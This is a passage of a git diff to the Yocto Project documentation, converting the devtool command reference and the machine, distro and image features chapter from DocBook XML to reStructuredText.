- run the <filename>devtool update-recipe</filename> to create the
- patches and update the recipe:
- <literallayout class='monospaced'>
- $ devtool update-recipe <replaceable>recipe</replaceable>
- </literallayout>
- If you run the <filename>devtool update-recipe</filename>
- without committing your changes, the command ignores the
- changes.
- </para>
-
- <para>
- Often, you might want to apply customizations made to your
- software in your own layer rather than apply them to the
- original recipe.
- If so, you can use the
- <filename>-a</filename> or <filename>--append</filename>
- option with the <filename>devtool update-recipe</filename>
- command.
- These options allow you to specify the layer into which to
- write an append file:
- <literallayout class='monospaced'>
- $ devtool update-recipe <replaceable>recipe</replaceable> -a <replaceable>base-layer-directory</replaceable>
- </literallayout>
- The <filename>*.bbappend</filename> file is created at the
- appropriate path within the specified layer directory, which
- may or may not be in your <filename>bblayers.conf</filename>
- file.
- If an append file already exists, the command updates it
- appropriately.
- </para>
- </section>
-
- <section id='devtool-checking-on-the-upgrade-status-of-a-recipe'>
- <title>Checking on the Upgrade Status of a Recipe</title>
-
- <para>
- Upstream recipes change over time.
- Consequently, you might find that you need to determine if you
- can upgrade a recipe to a newer version.
- </para>
-
- <para>
- To check on the upgrade status of a recipe, use the
- <filename>devtool check-upgrade-status</filename> command.
- The command displays a table of your current recipe versions,
- the latest upstream versions, the email address of the recipe's
- maintainer, and any additional information such as commit hash
- strings and reasons you might not be able to upgrade a particular
- recipe.
- <note><title>NOTES:</title>
- <itemizedlist>
- <listitem><para>
- For the <filename>oe-core</filename> layer, recipe
- maintainers come from the
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/meta/conf/distro/include/maintainers.inc'><filename>maintainers.inc</filename></ulink>
- file.
- </para></listitem>
- <listitem><para>
- If the recipe is using the
- <ulink url='&YOCTO_DOCS_BB_URL;#git-fetcher'>Git fetcher</ulink>
- rather than a tarball, the commit hash points to the
- commit that matches the recipe's latest version tag.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- As with all <filename>devtool</filename> commands, you can get
- help on the individual command:
- <literallayout class='monospaced'>
- $ devtool check-upgrade-status -h
- NOTE: Starting bitbake server...
- usage: devtool check-upgrade-status [-h] [--all] [recipe [recipe ...]]
-
- Prints a table of recipes together with versions currently provided by
- recipes, and latest upstream versions, when there is a later version available
-
- arguments:
- recipe Name of the recipe to report (omit to report upgrade info for
- all recipes)
-
- options:
- -h, --help show this help message and exit
- --all, -a Show all recipes, not just recipes needing upgrade
- </literallayout>
- </para>
-
- <para>
- Unless you provide a specific recipe name on the command line,
- the command checks all recipes in all configured layers.
- </para>
-
- <para>
- Following is a partial example table that reports on all the
- recipes.
- Notice the reported reason for not upgrading the
- <filename>base-passwd</filename> recipe.
- In this example, while a new version is available upstream,
- you do not want to use it because the dependency on
- <filename>cdebconf</filename> is not easily satisfied.
- <note>
- When a reason for not upgrading displays, the reason is
- usually written into the recipe using the
- <filename>RECIPE_NO_UPDATE_REASON</filename> variable.
- See the
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb'><filename>base-passwd.bb</filename></ulink>
- recipe for an example.
- </note>
- <literallayout class='monospaced'>
- $ devtool check-upgrade-status
- ...
- NOTE: acpid 2.0.30 2.0.31
- Ross Burton &lt;ross.burton@intel.com&gt;
- NOTE: u-boot-fw-utils 2018.11 2019.01
- Marek Vasut &lt;marek.vasut@gmail.com&gt;
- d3689267f92c5956e09cc7d1baa4700141662bff
- NOTE: u-boot-tools 2018.11 2019.01
- Marek Vasut &lt;marek.vasut@gmail.com&gt;
- d3689267f92c5956e09cc7d1baa4700141662bff
- .
- .
- .
- NOTE: base-passwd 3.5.29 3.5.45
- Anuj Mittal &lt;anuj.mittal@intel.com&gt; cannot be updated due to: Version
- 3.5.38 requires cdebconf for update-passwd utility
- NOTE: busybox 1.29.2 1.30.0
- Andrej Valek &lt;andrej.valek@siemens.com&gt;
- NOTE: dbus-test 1.12.10 1.12.12
- Chen Qi &lt;Qi.Chen@windriver.com&gt;
- </literallayout>
- </para>
- </section>
-
- <section id='devtool-upgrading-a-recipe'>
- <title>Upgrading a Recipe</title>
-
- <para>
- As software matures, upstream recipes are upgraded to newer
- versions.
- As a developer, you need to keep your local recipes up-to-date
- with the upstream version releases.
- Several methods exist by which you can upgrade recipes.
- You can read about them in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#gs-upgrading-recipes'>Upgrading Recipes</ulink>"
- section of the Yocto Project Development Tasks Manual.
- This section overviews the <filename>devtool upgrade</filename>
- command.
- <note>
- Before you upgrade a recipe, you can check on its upgrade
- status.
- See the
- "<link linkend='devtool-checking-on-the-upgrade-status-of-a-recipe'>Checking on the Upgrade Status of a Recipe</link>"
- for more information.
- </note>
- </para>
-
- <para>
- The <filename>devtool upgrade</filename> command
- upgrades an existing recipe to a more recent version of the
- recipe upstream.
- The command puts the upgraded recipe file along with any associated
- files into a "workspace" and, if necessary, extracts the source
- tree to a specified location.
- During the upgrade, patches associated with the recipe are
- rebased or added as needed.
- </para>
-
- <para>
- When you use the <filename>devtool upgrade</filename> command,
- you must supply the root name of the recipe (i.e. no version,
- paths, or extensions), and you must supply the directory
- to which you want the source extracted.
- Additional command options let you control things such as
- the version number to which you want to upgrade (i.e. the
- <link linkend='var-PV'><filename>PV</filename></link>),
- the source revision to which you want to upgrade (i.e. the
- <link linkend='var-SRCREV'><filename>SRCREV</filename></link>),
- whether or not to apply patches, and so forth.
- </para>
-
- <para>
- You can read more on the <filename>devtool upgrade</filename>
- workflow in the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-devtool-use-devtool-upgrade-to-create-a-version-of-the-recipe-that-supports-a-newer-version-of-the-software'>Use <filename>devtool upgrade</filename> to Create a Version of the Recipe that Supports a Newer Version of the Software</ulink>"
- section in the Yocto Project Application Development and the
- Extensible Software Development Kit (eSDK) manual.
- You can also see an example of how to use
- <filename>devtool upgrade</filename> in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#gs-using-devtool-upgrade'>Using <filename>devtool upgrade</filename></ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='devtool-resetting-a-recipe'>
- <title>Resetting a Recipe</title>
-
- <para>
- Use the <filename>devtool reset</filename> command to remove a
- recipe and its configuration (e.g. the corresponding
- <filename>.bbappend</filename> file) from the workspace layer.
- Realize that this command deletes the recipe and the
- append file.
- The command does not physically move them for you.
- Consequently, you must be sure to physically relocate your
- updated recipe and the append file outside of the workspace
- layer before running the <filename>devtool reset</filename>
- command.
- </para>
-
- <para>
- If the <filename>devtool reset</filename> command detects that
- the recipe or the append files have been modified, the
- command preserves the modified files in a separate "attic"
- subdirectory under the workspace layer.
- </para>
-
- <para>
- Here is an example that resets the workspace directory that
- contains the <filename>mtr</filename> recipe:
- <literallayout class='monospaced'>
- $ devtool reset mtr
- NOTE: Cleaning sysroot for recipe mtr...
- NOTE: Leaving source tree /home/scottrif/poky/build/workspace/sources/mtr as-is; if you no
- longer need it then please delete it manually
- $
- </literallayout>
- </para>
- </section>
-
- <section id='devtool-building-your-recipe'>
- <title>Building Your Recipe</title>
-
- <para>
- Use the <filename>devtool build</filename> command to build your
- recipe.
- The <filename>devtool build</filename> command is equivalent to
- the <filename>bitbake -c populate_sysroot</filename> command.
- </para>
-
- <para>
- When you use the <filename>devtool build</filename> command,
- you must supply the root name of the recipe (i.e. do not provide
- versions, paths, or extensions).
- You can use either the "-s" or the "--disable-parallel-make"
- options to disable parallel makes during the build.
- Here is an example:
- <literallayout class='monospaced'>
- $ devtool build <replaceable>recipe</replaceable>
- </literallayout>
- </para>
- </section>
-
- <section id='devtool-building-your-image'>
- <title>Building Your Image</title>
-
- <para>
- Use the <filename>devtool build-image</filename> command
- to build an image, extending it to include packages from
- recipes in the workspace.
- Using this command is useful when you want an image that
- ready for immediate deployment onto a device for testing.
- For proper integration into a final image, you need to
- edit your custom image recipe appropriately.
- </para>
-
- <para>
- When you use the <filename>devtool build-image</filename>
- command, you must supply the name of the image.
- This command has no command line options:
- <literallayout class='monospaced'>
- $ devtool build-image <replaceable>image</replaceable>
- </literallayout>
- </para>
- </section>
-
- <section id='devtool-deploying-your-software-on-the-target-machine'>
- <title>Deploying Your Software on the Target Machine</title>
-
- <para>
- Use the <filename>devtool deploy-target</filename> command to
- deploy the recipe's build output to the live target machine:
- <literallayout class='monospaced'>
- $ devtool deploy-target <replaceable>recipe</replaceable>&nbsp;<replaceable>target</replaceable>
- </literallayout>
- The <replaceable>target</replaceable> is the address of the
- target machine, which must be running an SSH server (i.e.
- <filename>user@hostname[:destdir]</filename>).
- </para>
-
- <para>
- This command deploys all files installed during the
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task.
- Furthermore, you do not need to have package management enabled
- within the target machine.
- If you do, the package manager is bypassed.
- <note><title>Notes</title>
- <para>
- The <filename>deploy-target</filename>
- functionality is for development only.
- You should never use it to update an image that will be
- used in production.
- </para>
- </note>
- </para>
-
- <para>
- Some conditions exist that could prevent a deployed application
- from behaving as expected.
- When both of the following conditions exist, your application has
- the potential to not behave correctly when run on the target:
- <itemizedlist>
- <listitem><para>
- You are deploying a new application to the target and
- the recipe you used to build the application had
- correctly defined runtime dependencies.
- </para></listitem>
- <listitem><para>
- The target does not physically have the packages on which
- the application depends installed.
- </para></listitem>
- </itemizedlist>
- If both of these conditions exist, your application will not
- behave as expected.
- The reason for this misbehavior is because the
- <filename>devtool deploy-target</filename> command does not deploy
- the packages (e.g. libraries) on which your new application
- depends.
- The assumption is that the packages are already on the target.
- Consequently, when a runtime call is made in the application
- for a dependent function (e.g. a library call), the function
- cannot be found.
- </para>
-
- <para>
- To be sure you have all the dependencies local to the target, you
- need to be sure that the packages are pre-deployed (installed)
- on the target before attempting to run your application.
- </para>
- </section>
-
- <section id='devtool-removing-your-software-from-the-target-machine'>
- <title>Removing Your Software from the Target Machine</title>
-
- <para>
- Use the <filename>devtool undeploy-target</filename> command to
- remove deployed build output from the target machine.
- For the <filename>devtool undeploy-target</filename> command to
- work, you must have previously used the
- <link linkend='devtool-deploying-your-software-on-the-target-machine'><filename>devtool deploy-target</filename></link>
- command.
- <literallayout class='monospaced'>
- $ devtool undeploy-target <replaceable>recipe</replaceable>&nbsp;<replaceable>target</replaceable>
- </literallayout>
- The <replaceable>target</replaceable> is the address of the
- target machine, which must be running an SSH server (i.e.
- <filename>user@hostname</filename>).
- </para>
- </section>
-
- <section id='devtool-creating-the-workspace'>
- <title>Creating the Workspace Layer in an Alternative Location</title>
-
- <para>
- Use the <filename>devtool create-workspace</filename> command to
- create a new workspace layer in your
- <link linkend='build-directory'>Build Directory</link>.
- When you create a new workspace layer, it is populated with the
- <filename>README</filename> file and the
- <filename>conf</filename> directory only.
- </para>
-
- <para>
- The following example creates a new workspace layer in your
- current working and by default names the workspace layer
- "workspace":
- <literallayout class='monospaced'>
- $ devtool create-workspace
- </literallayout>
- </para>
-
- <para>
- You can create a workspace layer anywhere by supplying
- a pathname with the command.
- The following command creates a new workspace layer named
- "new-workspace":
- <literallayout class='monospaced'>
- $ devtool create-workspace /home/scottrif/new-workspace
- </literallayout>
- </para>
- </section>
-
- <section id='devtool-get-the-status-of-the-recipes-in-your-workspace'>
- <title>Get the Status of the Recipes in Your Workspace</title>
-
- <para>
- Use the <filename>devtool status</filename> command to
- list the recipes currently in your workspace.
- Information includes the paths to their respective
- external source trees.
- </para>
-
- <para>
- The <filename>devtool status</filename> command has no
- command-line options:
- <literallayout class='monospaced'>
- $ devtool status
- </literallayout>
- Following is sample output after using
- <link linkend='devtool-adding-a-new-recipe-to-the-workspace'><filename>devtool add</filename></link>
- to create and add the <filename>mtr_0.86.bb</filename> recipe
- to the <filename>workspace</filename> directory:
- <literallayout class='monospaced'>
- $ devtool status
- mtr: /home/scottrif/poky/build/workspace/sources/mtr (/home/scottrif/poky/build/workspace/recipes/mtr/mtr_0.86.bb)
- $
- </literallayout>
- </para>
- </section>
-
- <section id='devtool-search-for-available-target-recipes'>
- <title>Search for Available Target Recipes</title>
-
- <para>
- Use the <filename>devtool search</filename> command to
- search for available target recipes.
- The command matches the recipe name, package name,
- description, and installed files.
- The command displays the recipe name as a result of a
- match.
- </para>
-
- <para>
- When you use the <filename>devtool search</filename> command,
- you must supply a <replaceable>keyword</replaceable>.
- The command uses the <replaceable>keyword</replaceable> when
- searching for a match.
- </para>
- </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-features.rst b/documentation/ref-manual/ref-features.rst
new file mode 100644
index 0000000000..be3a9e3a3e
--- /dev/null
+++ b/documentation/ref-manual/ref-features.rst
@@ -0,0 +1,352 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+********
+Features
+********
+
+This chapter provides a reference of shipped machine and distro features
+you can include as part of your image, a reference on image features you
+can select, and a reference on feature backfilling.
+
+Features provide a mechanism for working out which packages should be
+included in the generated images. Distributions can select which
+features they want to support through the ``DISTRO_FEATURES`` variable,
+which is set or appended to in a distribution's configuration file such
+as ``poky.conf``, ``poky-tiny.conf``, ``poky-lsb.conf`` and so forth.
+Machine features are set in the ``MACHINE_FEATURES`` variable, which is
+set in the machine configuration file and specifies the hardware
+features for a given machine.
+
+These two variables combine to work out which kernel modules, utilities,
+and other packages to include. A given distribution can support a
+selected subset of features so some machine features might not be
+included if the distribution itself does not support them.
+
+One method you can use to determine which recipes are checking to see if
+a particular feature is contained or not is to ``grep`` through the
+:term:`Metadata` for the feature. Here is an example that
+discovers the recipes whose build is potentially changed based on a
+given feature:
+::
+
+ $ cd poky
+ $ git grep 'contains.*MACHINE_FEATURES.*feature'
+
+.. _ref-features-machine:
+
+Machine Features
+================
+
+The items below are features you can use with
+:term:`MACHINE_FEATURES`. Features do not have a
+one-to-one correspondence to packages, and they can go beyond simply
+controlling the installation of a package or packages. Sometimes a
+feature can influence how certain recipes are built. For example, a
+feature might determine whether a particular configure option is
+specified within the :ref:`ref-tasks-configure` task
+for a particular recipe.
+
+This feature list only represents features as shipped with the Yocto
+Project metadata:
+
+- *acpi:* Hardware has ACPI (x86/x86_64 only)
+
+- *alsa:* Hardware has ALSA audio drivers
+
+- *apm:* Hardware uses APM (or APM emulation)
+
+- *bluetooth:* Hardware has integrated BT
+
+- *efi:* Support for booting through EFI
+
+- *ext2:* Hardware HDD or Microdrive
+
+- *keyboard:* Hardware has a keyboard
+
+- *numa:* Hardware has non-uniform memory access
+
+- *pcbios:* Support for booting through BIOS
+
+- *pci:* Hardware has a PCI bus
+
+- *pcmcia:* Hardware has PCMCIA or CompactFlash sockets
+
+- *phone:* Mobile phone (voice) support
+
+- *qvga:* Machine has a QVGA (320x240) display
+
+- *rtc:* Machine has a Real-Time Clock
+
+- *screen:* Hardware has a screen
+
+- *serial:* Hardware has serial support (usually RS232)
+
+- *touchscreen:* Hardware has a touchscreen
+
+- *usbgadget:* Hardware is USB gadget device capable
+
+- *usbhost:* Hardware is USB Host capable
+
+- *vfat:* FAT file system support
+
+- *wifi:* Hardware has integrated WiFi
+
+.. _ref-features-distro:
+
+Distro Features
+===============
+
+The items below are features you can use with
+:term:`DISTRO_FEATURES` to enable features across
+your distribution. Features do not have a one-to-one correspondence to
+packages, and they can go beyond simply controlling the installation of
+a package or packages. In most cases, the presence or absence of a
+feature translates to the appropriate option supplied to the configure
+script during the :ref:`ref-tasks-configure` task for
+the recipes that optionally support the feature.
+
+Some distro features are also machine features. These select features
+make sense to be controlled both at the machine and distribution
+configuration level. See the
+:term:`COMBINED_FEATURES` variable for more
+information.
+
+This list only represents features as shipped with the Yocto Project
+metadata:
+
+- *alsa:* Include ALSA support (OSS compatibility kernel modules
+ installed if available).
+
+- *api-documentation:* Enables generation of API documentation during
+ recipe builds. The resulting documentation is added to SDK tarballs
+ when the ``bitbake -c populate_sdk`` command is used. See the
+ ":ref:`sdk-manual/sdk-appendix-customizing-standard:adding api documentation to the standard sdk`"
+ section in the Yocto Project Application Development and the
+ Extensible Software Development Kit (eSDK) manual.
+
+- *bluetooth:* Include bluetooth support (integrated BT only).
+
+- *cramfs:* Include CramFS support.
+
+- *directfb:* Include DirectFB support.
+
+- *ext2:* Include tools for supporting for devices with internal
+ HDD/Microdrive for storing files (instead of Flash only devices).
+
+- *ipsec:* Include IPSec support.
+
+- *ipv6:* Include IPv6 support.
+
+- *keyboard:* Include keyboard support (e.g. keymaps will be loaded
+ during boot).
+
+- *ldconfig:* Include support for ldconfig and ``ld.so.conf`` on the
+ target.
+
+- *nfs:* Include NFS client support (for mounting NFS exports on
+ device).
+
+- *opengl:* Include the Open Graphics Library, which is a
+ cross-language, multi-platform application programming interface used
+ for rendering two and three-dimensional graphics.
+
+- *pci:* Include PCI bus support.
+
+- *pcmcia:* Include PCMCIA/CompactFlash support.
+
+- *ppp:* Include PPP dialup support.
+
+- *ptest:* Enables building the package tests where supported by
+ individual recipes. For more information on package tests, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:testing packages with ptest`" section
+ in the Yocto Project Development Tasks Manual.
+
+- *smbfs:* Include SMB networks client support (for mounting
+ Samba/Microsoft Windows shares on device).
+
+- *systemd:* Include support for this ``init`` manager, which is a full
+ replacement of for ``init`` with parallel starting of services,
+ reduced shell overhead, and other features. This ``init`` manager is
+ used by many distributions.
+
+- *usbgadget:* Include USB Gadget Device support (for USB
+ networking/serial/storage).
+
+- *usbhost:* Include USB Host support (allows to connect external
+ keyboard, mouse, storage, network etc).
+
+- *usrmerge:* Merges the ``/bin``, ``/sbin``, ``/lib``, and ``/lib64``
+ directories into their respective counterparts in the ``/usr``
+ directory to provide better package and application compatibility.
+
+- *wayland:* Include the Wayland display server protocol and the
+ library that supports it.
+
+- *wifi:* Include WiFi support (integrated only).
+
+- *x11:* Include the X server and libraries.
+
+.. _ref-features-image:
+
+Image Features
+==============
+
+The contents of images generated by the OpenEmbedded build system can be
+controlled by the :term:`IMAGE_FEATURES` and
+:term:`EXTRA_IMAGE_FEATURES` variables that
+you typically configure in your image recipes. Through these variables,
+you can add several different predefined packages such as development
+utilities or packages with debug information needed to investigate
+application problems or profile applications.
+
+The following image features are available for all images:
+
+- *allow-empty-password:* Allows Dropbear and OpenSSH to accept root
+ logins and logins from accounts having an empty password string.
+
+- *dbg-pkgs:* Installs debug symbol packages for all packages installed
+ in a given image.
+
+- *debug-tweaks:* Makes an image suitable for development (e.g. allows
+ root logins without passwords and enables post-installation logging).
+ See the 'allow-empty-password', 'empty-root-password', and
+ 'post-install-logging' features in this list for additional
+ information.
+
+- *dev-pkgs:* Installs development packages (headers and extra library
+ links) for all packages installed in a given image.
+
+- *doc-pkgs:* Installs documentation packages for all packages
+ installed in a given image.
+
+- *empty-root-password:* Sets the root password to an empty string,
+ which allows logins with a blank password.
+
+- *package-management:* Installs package management tools and preserves
+ the package manager database.
+
+- *post-install-logging:* Enables logging postinstall script runs to
+ the ``/var/log/postinstall.log`` file on first boot of the image on
+ the target system.
+
+ .. note::
+
+ To make the ``/var/log`` directory on the target persistent, use the
+ :term:`VOLATILE_LOG_DIR` variable by setting it to "no".
+
+- *ptest-pkgs:* Installs ptest packages for all ptest-enabled recipes.
+
+- *read-only-rootfs:* Creates an image whose root filesystem is
+ read-only. See the
+ ":ref:`dev-manual/dev-manual-common-tasks:creating a read-only root filesystem`"
+ section in the Yocto Project Development Tasks Manual for more
+ information.
+
+- *splash:* Enables showing a splash screen during boot. By default,
+ this screen is provided by ``psplash``, which does allow
+ customization. If you prefer to use an alternative splash screen
+ package, you can do so by setting the ``SPLASH`` variable to a
+ different package name (or names) within the image recipe or at the
+ distro configuration level.
+
+- *staticdev-pkgs:* Installs static development packages, which are
+ static libraries (i.e. ``*.a`` files), for all packages installed in
+ a given image.
+
+Some image features are available only when you inherit the
+:ref:`core-image <ref-classes-core-image>` class. The current list of
+these valid features is as follows:
+
+- *hwcodecs:* Installs hardware acceleration codecs.
+
+- *nfs-server:* Installs an NFS server.
+
+- *perf:* Installs profiling tools such as ``perf``, ``systemtap``, and
+ ``LTTng``. For general information on user-space tools, see the
+ :doc:`../sdk-manual/sdk-manual` manual.
+
+- *ssh-server-dropbear:* Installs the Dropbear minimal SSH server.
+
+- *ssh-server-openssh:* Installs the OpenSSH SSH server, which is more
+ full-featured than Dropbear. Note that if both the OpenSSH SSH server
+ and the Dropbear minimal SSH server are present in
+ ``IMAGE_FEATURES``, then OpenSSH will take precedence and Dropbear
+ will not be installed.
+
+- *tools-debug:* Installs debugging tools such as ``strace`` and
+ ``gdb``. For information on GDB, see the
+ ":ref:`platdev-gdb-remotedebug`" section
+ in the Yocto Project Development Tasks Manual. For information on
+ tracing and profiling, see the :doc:`../profile-manual/profile-manual`.
+
+- *tools-sdk:* Installs a full SDK that runs on the device.
+
+- *tools-testapps:* Installs device testing tools (e.g. touchscreen
+ debugging).
+
+- *x11:* Installs the X server.
+
+- *x11-base:* Installs the X server with a minimal environment.
+
+- *x11-sato:* Installs the OpenedHand Sato environment.
+
+.. _ref-features-backfill:
+
+Feature Backfilling
+===================
+
+Sometimes it is necessary in the OpenEmbedded build system to extend
+:term:`MACHINE_FEATURES` or
+:term:`DISTRO_FEATURES` to control functionality
+that was previously enabled and not able to be disabled. For these
+cases, we need to add an additional feature item to appear in one of
+these variables, but we do not want to force developers who have
+existing values of the variables in their configuration to add the new
+feature in order to retain the same overall level of functionality.
+Thus, the OpenEmbedded build system has a mechanism to automatically
+"backfill" these added features into existing distro or machine
+configurations. You can see the list of features for which this is done
+by finding the
+:term:`DISTRO_FEATURES_BACKFILL` and
+:term:`MACHINE_FEATURES_BACKFILL`
+variables in the ``meta/conf/bitbake.conf`` file.
+
+Because such features are backfilled by default into all configurations
+as described in the previous paragraph, developers who wish to disable
+the new features need to be able to selectively prevent the backfilling
+from occurring. They can do this by adding the undesired feature or
+features to the
+:term:`DISTRO_FEATURES_BACKFILL_CONSIDERED`
+or
+:term:`MACHINE_FEATURES_BACKFILL_CONSIDERED`
+variables for distro features and machine features respectively.
+
+Here are two examples to help illustrate feature backfilling:
+
+- *The "pulseaudio" distro feature option*: Previously, PulseAudio
+ support was enabled within the Qt and GStreamer frameworks. Because
+ of this, the feature is backfilled and thus enabled for all distros
+ through the ``DISTRO_FEATURES_BACKFILL`` variable in the
+ ``meta/conf/bitbake.conf`` file. However, your distro needs to
+ disable the feature. You can disable the feature without affecting
+ other existing distro configurations that need PulseAudio support by
+ adding "pulseaudio" to ``DISTRO_FEATURES_BACKFILL_CONSIDERED`` in
+ your distro's ``.conf`` file. Adding the feature to this variable
+ when it also exists in the ``DISTRO_FEATURES_BACKFILL`` variable
+ prevents the build system from adding the feature to your
+ configuration's ``DISTRO_FEATURES``, effectively disabling the
+ feature for that particular distro.
+
+- *The "rtc" machine feature option*: Previously, real time clock (RTC)
+ support was enabled for all target devices. Because of this, the
+ feature is backfilled and thus enabled for all machines through the
+ ``MACHINE_FEATURES_BACKFILL`` variable in the
+ ``meta/conf/bitbake.conf`` file. However, your target device does not
+ have this capability. You can disable RTC support for your device
+ without affecting other machines that need RTC support by adding the
+ feature to your machine's ``MACHINE_FEATURES_BACKFILL_CONSIDERED``
+ list in the machine's ``.conf`` file. Adding the feature to this
+ variable when it also exists in the ``MACHINE_FEATURES_BACKFILL``
+ variable prevents the build system from adding the feature to your
+ configuration's ``MACHINE_FEATURES``, effectively disabling RTC
+ support for that particular machine.
diff --git a/documentation/ref-manual/ref-features.xml b/documentation/ref-manual/ref-features.xml
deleted file mode 100644
index 294b297c20..0000000000
--- a/documentation/ref-manual/ref-features.xml
+++ /dev/null
@@ -1,460 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-features'>
- <title>Features</title>
-
- <para>
- This chapter provides a reference of shipped machine and distro features
- you can include as part of your image, a reference on image features you can
- select, and a reference on feature backfilling.
- </para>
-
- <para>
- Features provide a mechanism for working out which packages
- should be included in the generated images.
- Distributions can select which features they want to support through the
- <filename><link linkend='var-DISTRO_FEATURES'>DISTRO_FEATURES</link></filename>
- variable, which is set or appended to in a distribution's configuration file such as
- <filename>poky.conf</filename>,
- <filename>poky-tiny.conf</filename>,
- <filename>poky-lsb.conf</filename> and so forth.
- Machine features are set in the
- <filename><link linkend='var-MACHINE_FEATURES'>MACHINE_FEATURES</link></filename>
- variable, which is set in the machine configuration file and
- specifies the hardware features for a given machine.
- </para>
-
- <para>
- These two variables combine to work out which kernel modules,
- utilities, and other packages to include.
- A given distribution can support a selected subset of features so some machine features might not
- be included if the distribution itself does not support them.
- </para>
-
- <para>
- One method you can use to determine which recipes are checking to see if a
- particular feature is contained or not is to <filename>grep</filename> through
- the <link linkend='metadata'>Metadata</link>
- for the feature.
- Here is an example that discovers the recipes whose build is potentially
- changed based on a given feature:
- <literallayout class='monospaced'>
- $ cd poky
- $ git grep 'contains.*MACHINE_FEATURES.*<replaceable>feature</replaceable>'
- </literallayout>
- </para>
-
- <section id='ref-features-machine'>
- <title>Machine Features</title>
-
- <para>
- The items below are features you can use with
- <link linkend='var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></link>.
- Features do not have a one-to-one correspondence to packages, and they can
- go beyond simply controlling the installation of a package or packages.
- Sometimes a feature can influence how certain recipes are built.
- For example, a feature might determine whether a particular configure option
- is specified within the
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
- task for a particular recipe.
- </para>
-
- <para>
- This feature list only represents features as shipped with the Yocto Project metadata:
- <itemizedlist>
- <listitem><para><emphasis>acpi:</emphasis> Hardware has ACPI (x86/x86_64 only)
- </para></listitem>
- <listitem><para><emphasis>alsa:</emphasis> Hardware has ALSA audio drivers
- </para></listitem>
- <listitem><para><emphasis>apm:</emphasis> Hardware uses APM (or APM emulation)
- </para></listitem>
- <listitem><para><emphasis>bluetooth:</emphasis> Hardware has integrated BT
- </para></listitem>
- <listitem><para><emphasis>efi:</emphasis> Support for booting through EFI
- </para></listitem>
- <listitem><para><emphasis>ext2:</emphasis> Hardware HDD or Microdrive
- </para></listitem>
- <listitem><para><emphasis>keyboard:</emphasis> Hardware has a keyboard
- </para></listitem>
- <listitem><para><emphasis>pcbios:</emphasis> Support for booting through BIOS
- </para></listitem>
- <listitem><para><emphasis>pci:</emphasis> Hardware has a PCI bus
- </para></listitem>
- <listitem><para><emphasis>pcmcia:</emphasis> Hardware has PCMCIA or CompactFlash sockets
- </para></listitem>
- <listitem><para><emphasis>phone:</emphasis> Mobile phone (voice) support
- </para></listitem>
- <listitem><para><emphasis>qvga:</emphasis> Machine has a QVGA (320x240) display
- </para></listitem>
- <listitem><para><emphasis>rtc:</emphasis> Machine has a Real-Time Clock
- </para></listitem>
- <listitem><para><emphasis>screen:</emphasis> Hardware has a screen
- </para></listitem>
- <listitem><para><emphasis>serial:</emphasis> Hardware has serial support (usually RS232)
- </para></listitem>
- <listitem><para><emphasis>touchscreen:</emphasis> Hardware has a touchscreen
- </para></listitem>
- <listitem><para><emphasis>usbgadget:</emphasis> Hardware is USB gadget device capable
- </para></listitem>
- <listitem><para><emphasis>usbhost:</emphasis> Hardware is USB Host capable
- </para></listitem>
- <listitem><para><emphasis>vfat:</emphasis> FAT file system support
- </para></listitem>
- <listitem><para><emphasis>wifi:</emphasis> Hardware has integrated WiFi
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='ref-features-distro'>
- <title>Distro Features</title>
-
- <para>
- The items below are features you can use with
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
- to enable features across your distribution.
- Features do not have a one-to-one correspondence to packages,
- and they can go beyond simply controlling the installation of a
- package or packages.
- In most cases, the presence or absence of a feature translates to
- the appropriate option supplied to the configure script during the
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
- task for the recipes that optionally
- support the feature.
- </para>
-
- <para>
- Some distro features are also machine features.
- These select features make sense to be controlled both at
- the machine and distribution configuration level.
- See the
- <link linkend='var-COMBINED_FEATURES'><filename>COMBINED_FEATURES</filename></link>
- variable for more information.
- </para>
-
- <para>
- This list only represents features as shipped with the Yocto Project metadata:
- <itemizedlist>
- <listitem><para><emphasis>alsa:</emphasis> Include ALSA support
- (OSS compatibility kernel modules installed if available).
- </para></listitem>
- <listitem><para><emphasis>api-documentation:</emphasis>
- Enables generation of API documentation during recipe
- builds.
- The resulting documentation is added to SDK tarballs
- when the
- <filename>bitbake -c populate_sdk</filename> command
- is used.
- See the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#adding-api-documentation-to-the-standard-sdk'>Adding API Documentation to the Standard SDK</ulink>"
- section in the Yocto Project Application Development and
- the Extensible Software Development Kit (eSDK) manual.
- </para></listitem>
- <listitem><para><emphasis>bluetooth:</emphasis> Include
- bluetooth support (integrated BT only).</para></listitem>
- <listitem><para><emphasis>cramfs:</emphasis> Include CramFS
- support.</para></listitem>
- <listitem><para><emphasis>directfb:</emphasis>
- Include DirectFB support.
- </para></listitem>
- <listitem><para><emphasis>ext2:</emphasis> Include tools for
- supporting for devices with internal HDD/Microdrive for
- storing files (instead of Flash only devices).
- </para></listitem>
- <listitem><para><emphasis>ipsec:</emphasis> Include IPSec
- support.</para></listitem>
- <listitem><para><emphasis>ipv6:</emphasis> Include IPv6 support.
- </para></listitem>
- <listitem><para><emphasis>keyboard:</emphasis> Include keyboard
- support (e.g. keymaps will be loaded during boot).
- </para></listitem>
- <listitem><para><emphasis>ldconfig:</emphasis>
- Include support for ldconfig and
- <filename>ld.so.conf</filename> on the target.
- </para></listitem>
